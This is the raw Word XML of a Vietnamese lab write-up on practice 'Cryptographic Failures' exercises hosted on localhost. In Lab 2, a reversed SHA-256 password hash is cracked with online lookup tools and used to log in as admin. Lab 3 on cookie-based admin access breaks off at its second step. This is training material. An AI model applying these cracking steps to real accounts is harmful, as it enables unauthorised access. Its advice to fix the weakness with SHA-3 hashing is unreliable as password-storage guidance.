    <w:p w14:paraId="621F156E" w14:textId="63D6EFF0" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc182909834"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="264BAFE0" w14:textId="4D84D8F6" w:rsidR="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Truy cập vào:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/cryptographic_failure/lab2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15017E13" w14:textId="6F4CE547" w:rsidR="002F50C5" w:rsidRPr="009D0400" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidR="00D12B8F" w:rsidRPr="00D12B8F">
        <w:t>Cryptographic Failures – Lab 2</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA1132" w14:textId="4D57A3C5" w:rsidR="002F50C5" w:rsidRPr="00724CB8" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>Sử dụng password đã được mã hóa thành ciphertext từ các thuật toán băm (hash) yếu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32628C7F" w14:textId="77777777" w:rsidR="002F50C5" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EEF7B4" w14:textId="5C404261" w:rsidR="00724CB8" w:rsidRDefault="00815B03" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>ruy cập vào task và dễ dàng thấy được thông tin đăng nhập gợi ý như sau:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> username: </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00366221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">password là một đoạn chuỗi kí tự ở dạng băm. Ý tưởng </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">là thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>giải mã đoạn chuỗi này với thuật toán băm nào đó để lấy được mật khẩu ở dạng bản rõ (plaintext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A17F06" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00E03530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C2C20DC" wp14:editId="43F5A131">
            <wp:extent cx="6115050" cy="2534920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1852312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12425" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2534920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692B95C" w14:textId="6E891EB8" w:rsidR="00724CB8" w:rsidRDefault="00815B03" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:t xml:space="preserve"> Tương tự như các yêu cầu trước đó</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:t xml:space="preserve"> kiểm tra chuỗi này với thuật toán băm MD5, tại </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="00724CB8" w:rsidRPr="00366221">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.md5online.org/md5-decrypt.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35DDD065" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E03530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4135A5A6" wp14:editId="4220AAC5">
            <wp:extent cx="6115050" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1247058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58948" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2623820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C841E" w14:textId="77777777" w:rsidR="00815B03" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">Kết quả không như mong đợi, tức là chuỗi kí tự: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19908198" w14:textId="61A0FED1" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">“d953b4a47ce307fcb8b1b85fc6a0d34aea5585b6ad9188beb94c1eea9bbb5c7a” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C861F5" w14:textId="057435FB" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t>Hoặc có thể linh hoạt khi đảo ngược chuỗi trên lại thành</w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D62E79E" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t>“a7c5bbb9aee1c49beb8819da6b5855aea43d0a6cf58b1b8bcf703ec74a4b359d” bằng cách thực hiện như hình bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C7CA8" w14:textId="56479302" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t>Nhưng kết quả không như mong đợi, bởi vì nó không phải là một bản ciphertext đã được mã hóa từ thuật toán băm MD5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526EDDA" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00797295">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A441CC2" wp14:editId="22102C79">
            <wp:extent cx="6115050" cy="3742055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1696270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70229" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3742055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FC691" w14:textId="354C5D50" w:rsidR="00724CB8" w:rsidRPr="008A7A05" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A7A05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t>Ý tưởng tiếp theo là thực hiện “dò” chuỗi trên với nhiều thuật toán băm thông thường khác đã được học và tìm hiểu trước đó.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A7A05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F36DA" w14:textId="77777777" w:rsidR="00815B03" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">Tuy nhiên: </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">hận thấy rằng chuỗi này có độ dài là 64 ký tự, tức là 256 bit, điều này thường được sử dụng với các thuật toán băm như SHA-256. Do vậy, trước tiên </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">là thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">thử giải mã với thuật toán SHA-256 này. </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t>Có thể s</w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">ử dụng công cụ online tại: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1AAFA" w14:textId="7A17A856" w:rsidR="00724CB8" w:rsidRPr="008A7A05" w:rsidRDefault="00815B03" w:rsidP="00724CB8">
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="0056451B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          </w:rPr>
          <w:t>https://10015.io/tools/sha256-encrypt-decrypt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B390DDD" w14:textId="767A48D1" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00815B03" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">hử với chuỗi trên (bao gồm cả chuỗi gốc và chuỗi đã đảo ngược) và đúng là SHA-256, nhận được kết quả như mong đợi (khi sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chuỗi đảo ngược</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D5B757" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00431A67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6186EA4F" wp14:editId="0FD7B610">
            <wp:extent cx="6115050" cy="3429635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="267490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90770" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3429635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE77F90" w14:textId="4C486958" w:rsidR="00724CB8" w:rsidRPr="008A7A05" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="008A7A05">
        <w:t xml:space="preserve">Kết quả nhận được là: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A7A05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1593EC" w14:textId="33B4A2B7" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B03">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iến hành đăng nhập với </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>password777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8B20E" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:t>Kết quả đăng nhập thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69339D73" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="00431A67" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00431A67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="617043BA" wp14:editId="2AE30E17">
            <wp:extent cx="6115050" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="240321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21673" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00431A67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00431A67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63A041D3" wp14:editId="160A21B5">
            <wp:extent cx="6115050" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="380522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22012" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1280160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4BC1B" w14:textId="77777777" w:rsidR="002F50C5" w:rsidRPr="009D0400" w:rsidRDefault="002F50C5" w:rsidP="002F50C5"/>
    <w:p w14:paraId="3FA4F0E6" w14:textId="78FC5D8E" w:rsidR="002F50C5" w:rsidRPr="009D0400" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001F070A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t xml:space="preserve">việc dùng thuật toán băm yếu </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">dễ bị nhận diện </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t>khiến hệ thống dễ bị tấn công dò tìm, làm lộ mật khẩu gốc và cho phép truy cập trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7656F5F8" w14:textId="1D1EACCB" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="002F50C5" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>Sử dụng các thuật toán băm SHA-3 để đảm bảo tính an toàn hơn so với các thuật toán băm đời cũ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF582D" w14:textId="5243E42E" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc182909835"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3F93B890" w14:textId="3D5CBFAC" w:rsidR="004E0865" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Truy cập vào:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="004E0865" w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/cryptographic_failure/lab3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AA603C1" w14:textId="7404C1BC" w:rsidR="00D12B8F" w:rsidRPr="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:t xml:space="preserve">Cryptographic Failures – Lab </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6989D" w14:textId="3C3A1EC6" w:rsidR="009D0400" w:rsidRPr="00724CB8" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00A31AA6">
        <w:t>Sử dụng cookie để đăng nhập với quyền admin khi quá trình mã hóa hoặc xác thực không hoạt động đúng cách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A498146" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59329DF4" w14:textId="4123C137" w:rsidR="00724CB8" w:rsidRPr="00A31AA6" w:rsidRDefault="00815B03" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00A31AA6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">ào task và có nhận thấy một điều là đã có một thông tin xác thực người dùng ở trang này rồi. Nhưng lại yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đă</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>ng nhập với t</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>ch quản trị vi</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ê</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t>n (admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E28EFB" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00D34193">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="431F8246" wp14:editId="2AD59C96">
            <wp:extent cx="6115050" cy="2152015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1486877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77350" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2152015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93F7E4" w14:textId="1C14565F" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00815B03" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
